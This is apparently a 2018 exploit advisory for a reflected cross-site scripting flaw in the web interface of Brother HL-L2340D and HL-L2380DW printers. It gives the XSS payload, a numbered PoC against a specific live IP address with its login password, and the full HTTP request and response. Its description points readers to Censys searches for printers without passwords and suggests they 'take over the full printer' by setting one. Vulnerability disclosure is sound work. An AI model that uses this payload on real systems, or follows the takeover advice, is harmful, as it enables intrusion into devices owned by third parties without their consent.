Brother HL-L2340D / HL-L2380DW Cross Site Scripting

`# Exploit Title: [ XSS at Brother HL-L2340D & HL-L2380DW series]  
  
  
# Date: [30.05.2018]  
  
# Exploit Author: [Huy Kha]  
  
# Vendor Homepage: [http://support.brother.com]  
  
# Software Link: [ Website ]  
  
# Version: HL-L2340D & HL-L2380DW series  
  
# Tested on: Mozilla FireFox  
  
# Reflected XSS Payload :  
  
"--!><Svg/OnLoad=(confirm)(1)>"  
  
# Description : Starting searching for printers without having a password.  
  
https://censys.io/ipv4?q=HL-L2340D+series  
  
https://censys.io/ipv4?q=HL-L2380DW+series  
  
  
When you see a yellow bar with ''Configure the password'' you can take  
over the full printer by putting a password on it.  
  
  
  
# PoC :  
  
This is a demo website. If you want to execute the XSS you need to be  
loged into the web interface first.  
  
  
1. Go to the following url: http://128.12.201.40/  
  
2. Login with ''HackMe123'' as password  
  
3. Now visit the following parameter:  
net/net/service_detail.html?service=1&pageid=236  
  
4. The XSS vulnerability exist in the service_detail.html?service=1 parameter.  
  
  
5. Demo URL: http://128.12.201.40/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241  
  
  
# Request :  
  
  
GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241  
HTTP/1.1  
Host: 128.12.201.40  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)  
Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: nl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
  
# Response :  
  
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 3389 Content-Type:  
text/html Content-Language: nl Connection: close Server: debut/1.20 Pragma:  
no-cache <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC  
"-//W3C//DTD XHTML 1.0 Strict//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="nl" xmlns="  
http://www.w3.org/1999/xhtml" xml:lang="nl"><head><meta  
http-equiv="Content-Script-Type" content="text/javascript" /><meta  
http-equiv="content-style-type" content="text/css" /><meta  
http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script  
type="text/javascript" src="/common/js/ews.js"></script> <link  
rel="stylesheet" type="text/css" href="../common/css/common.css" /> <link  
rel="stylesheet" type="text/css" href="../common/css/ews.css"  
/><title>Brother HL-L2340D series</title></head><body><div  
id="baseFrame"><div id="frameContainer"><div  
id="headerFrameContainerLeft"><div id="headerFrameContainerRight"><div  
id="headerFrameInner"><div id="headerFrame"><div  
id="modelName"><h1>HL-L2340D series</h1><div class="SetBox"  
id="SetBoxAuthRight"><div id="SetBoxAuthLeft"><form method="post"  
action="/general/status.html"><div>Log in<input type="password"  
id="LogBox" name="B1d6" /><input type="hidden" name="loginurl"  
value="/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241"/><input  
id="login" type="submit" value="&nbsp;"  
/></div></form></div></div></div><div id="corporateLogo"><img  
src="/common/images/logo.gif" alt="Brother" /></div></div><div  
id="solutions"><div><span><a href="  
http://solutions.brother.com/cgi-bin/solutions.cgi?MDL=prn088&LNG=en&SRC=DEVICE">Brother<br  
/>Solutions Center</a></span></div></div><div  
id="tabMenu"><ul><li><ul><li  
class="selected"><p>Algemeen</p></li></ul></li></ul></div></div></div></div><div  
id="mainFrameContainer"><div id="mainFrameTopLeft"><div  
id="mainFrameTopRight"><div id="mainFrameTopInner"><div  
id="subTabMenu">&nbsp;</div></div></div></div><div id="mainFrameInner"><div  
id="subMenu"><div><a href="/general/status.html">Status</a></div><div><a  
href="/general/reflesh.html"  
class="subPage">Interval voor autom. vernieuwen</a></div><div><a  
href="/general/information.html?kind=item">Onderhoudsinformatie</a></div><div><a  
href="/general/lists.html">Lijsten/Rapporten</a></div><div><a  
href="/general/find.html">Apparaat zoeken</a></div><div><a  
href="/general/contact.html">Contactpersoon & locatie</a></div><div><a  
href="/general/sleep.html">Slaapstand</a></div><div><a  
href="/general/powerdown.html">Automatisch uitschakelen</a></div><div><a  
href="/general/language.html">Taal</a></div><div><a  
href="/general/panel.html">Paneel</a></div><div><a  
href="/general/replacetoner.html">Toner vervangen</a></div></div><div  
id="rightFrameContainer"><div id="rightFrame"><div id="mainContent"><div  
id="pageTitle"><h2>Log in</h2></div><div id="pageContents"><div  
class="contentsGroup"><p  
class="noteMessage">Om deze pagina te openen moet u inloggen. Log in s.v.p.</p></div></div></div></div></div><script  
type="text/javascript"><!-- SetMinHeight(); // --></script></div><div  
id="mainFrameBottomLeft"><div id="mainFrameBottomRight"><div  
id="mainFrameBottomInner"></div></div></div></div><div  
id="footerFrameContainer"><div id="copyright">Copyright(C) 2000-2014  
Brother Industries, Ltd. All Rights Reserved.</div><div id="topBack"><a  
href="#">Top<img src="/common/images/ic_pt.gif" alt="Top"  
/></a></div></div></div></div></body></html>  
  
  
# How to fix it? :  
  
This has nothing to do with which version you use. Ofcourse I'll  
suggest you to update it to the latest version, but if you want to fix  
it. Put a strong password on the printer webinterface.  
  
  
# Note: The vendor has been contacted on 30-5-2018.  
  
  
  
Kind regards,  
  
Huy Kha  
  
https://twitter.com/huykha10  
  
linkedin.com/in/huykha  
`